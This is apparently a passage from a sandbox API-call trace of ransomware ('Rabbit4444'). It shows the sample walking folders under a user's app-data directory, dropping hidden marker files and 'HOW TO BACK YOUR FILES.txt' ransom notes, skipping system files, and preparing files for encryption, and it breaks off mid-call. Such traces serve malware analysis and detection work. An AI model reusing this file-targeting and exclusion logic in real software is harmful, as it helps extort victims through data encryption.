1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0062.547] lstrcpyW (in: lpString1=0x130ebc6, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0062.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0062.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x118188 [0062.547] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122228 [0062.547] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd21f4513, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x15867c3, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0062.547] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0062.548] lstrcpyW (in: lpString1=0x130ebc6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.548] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.548] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.548] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.549] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.549] CloseHandle (hObject=0x298) returned 1 [0062.549] CloseHandle (hObject=0x27c) returned 1 [0062.549] GetCurrentThreadId () returned 0xd98 [0062.549] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0062.549] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState" [0062.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118188 | out: hHeap=0xe0000) returned 1 [0062.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0062.549] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState" [0062.549] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\" [0062.549] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0062.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.551] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.554] FlushFileBuffers (hFile=0x27c) returned 1 [0062.555] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.555] CloseHandle (hObject=0x27c) returned 1 [0062.556] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState") returned 80 [0062.556] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.556] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd21f4513, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0062.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.556] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.556] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.556] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.556] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd21f4513, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.556] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.556] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.556] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.556] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.556] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.556] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee9c0e18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee9c0e18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.556] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.556] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.556] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee9c0e18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee9c0e18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.556] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0062.557] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.557] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.557] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.557] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.557] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.558] CloseHandle (hObject=0x298) returned 1 [0062.558] CloseHandle (hObject=0x27c) returned 1 [0062.558] GetCurrentThreadId () returned 0xd98 [0062.558] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0062.558] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData" [0062.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124250 | out: hHeap=0xe0000) returned 1 [0062.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0062.558] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData" [0062.558] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\" [0062.558] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0062.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.559] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.561] FlushFileBuffers (hFile=0x27c) returned 1 [0062.562] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.562] CloseHandle (hObject=0x27c) returned 1 [0062.563] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData") returned 84 [0062.563] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.563] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94eafafc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x94eafafc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0062.563] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.563] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.563] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.563] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.563] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94eafafc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x94eafafc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.563] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.563] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.563] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.563] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.563] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.563] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee9c0e18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee9c0e18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.563] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.563] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.564] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee9c0e18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee9c0e18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee9c0e18, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.564] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0062.564] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.564] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.569] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.569] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.569] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.569] CloseHandle (hObject=0x298) returned 1 [0062.569] CloseHandle (hObject=0x27c) returned 1 [0062.569] GetCurrentThreadId () returned 0xd98 [0062.569] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0062.569] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings" [0062.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120c90 | out: hHeap=0xe0000) returned 1 [0062.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0062.569] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings" [0062.569] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\" [0062.569] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0062.569] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.573] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.575] FlushFileBuffers (hFile=0x27c) returned 1 [0062.576] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.576] CloseHandle (hObject=0x27c) returned 1 [0062.577] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings") returned 79 [0062.577] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.577] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee9e70af, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0062.577] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.577] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.577] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.577] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee9e70af, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.577] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.577] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.577] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.577] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.577] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee9e70af, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee9e70af, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee9e70af, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.577] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15aca2b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x15aca2b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x15aca2b, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0062.577] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0062.578] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0062.578] lstrcpyW (in: lpString1=0x130ebd8, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0062.578] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0062.578] lstrlenW (lpString="roaming.lock") returned 12 [0062.578] lstrlenW (lpString="Rabbit4444") returned 10 [0062.578] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0062.578] lstrlenW (lpString=".dll") returned 4 [0062.578] lstrcmpiW (lpString1="lock", 